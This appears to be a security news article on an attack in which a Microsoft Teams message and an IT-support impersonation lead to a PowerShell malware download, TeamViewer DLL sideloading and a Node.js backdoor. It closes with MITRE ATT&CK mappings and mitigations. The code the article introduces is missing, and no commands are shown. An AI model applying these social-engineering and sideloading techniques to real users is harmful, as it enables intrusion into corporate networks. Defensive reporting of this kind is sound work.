A sophisticated multi-stage attack where threat actors leverage Microsoft Teams to deliver malicious payloads, establishing persistence and remote access to corporate networks.
This new attack vector exploits Teams’ perceived security as an internal business application, allowing attackers to bypass traditional email security controls.
Security firm Ontinue’s Cyber Defence Centre recently documented an incident in which attackers compromised systems using a combination of social engineering, vishing (voice phishing), and legitimate remote access tools.
.png
)
Attack Methodology and Sophisticated Chain
The attack began with the threat actor sending a Microsoft Teams message to the target containing a malicious PowerShell command.
“The actor transmitted a PowerShell command directly via the Teams message and also utilised the QuickAssist remote tool to gain access to the target device remotely,” investigators noted.
This initial access phase exploited users’ trust in team communications, particularly when the threat actor impersonated IT support personnel.
The observed PowerShell command executed from the target endpoint facilitated the download of first-stage malware:
Upon execution, the attack leveraged DLL sideloading techniques with a legitimate signed TeamViewer.exe binary loading a malicious TV.dll module.
This advanced technique helps bypass security controls as the initial executable appears legitimate and properly signed.
JavaScript Backdoor Establishes Command & Control
Analysis of the second-stage payload revealed a JavaScript-based backdoor executed via Node.js (renamed to hcmd.exe), which established a persistent connection to the attackers’ command-and-control infrastructure.
The backdoor included socket capabilities for remote connections and command execution:
This attack pattern aligns with techniques attributed to threat actor Storm-1811, known for leveraging vishing, Quick Assist, and social engineering tactics.
Microsoft has observed similar campaigns since mid-April 2024, in which attackers bombard victims with spam emails before calling while impersonating IT support staff.
Security researchers at Trend Micro have also documented comparable attacks distributing DarkGate malware through Teams voice calls, where victims were instructed to download remote access applications like AnyDesk.
Detection and Mitigation
The attack chain utilizes several MITRE ATT&CK techniques, including:
- T1105 – Ingress Tool Transfer
- T1656 – Impersonation
- T1219 – Remote Access Software
- T1218 – Signed Binary Proxy Execution
- T1197 – BITS Jobs
Security experts recommend that organizations block or uninstall Quick Assist and similar remote monitoring tools if they are not required. Additionally, organizations should consider disabling external connections to their Teams environment to prevent such attacks.
Microsoft has announced plans to implement alerts in Quick Assist to warn users of potential tech support scams.
As more people use collaboration tools like Microsoft Teams, organizations need to understand that these tools can be at risk of attacks. This means they need to put in place strong security measures and provide training to help users stay safe.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try 50 Request for Free
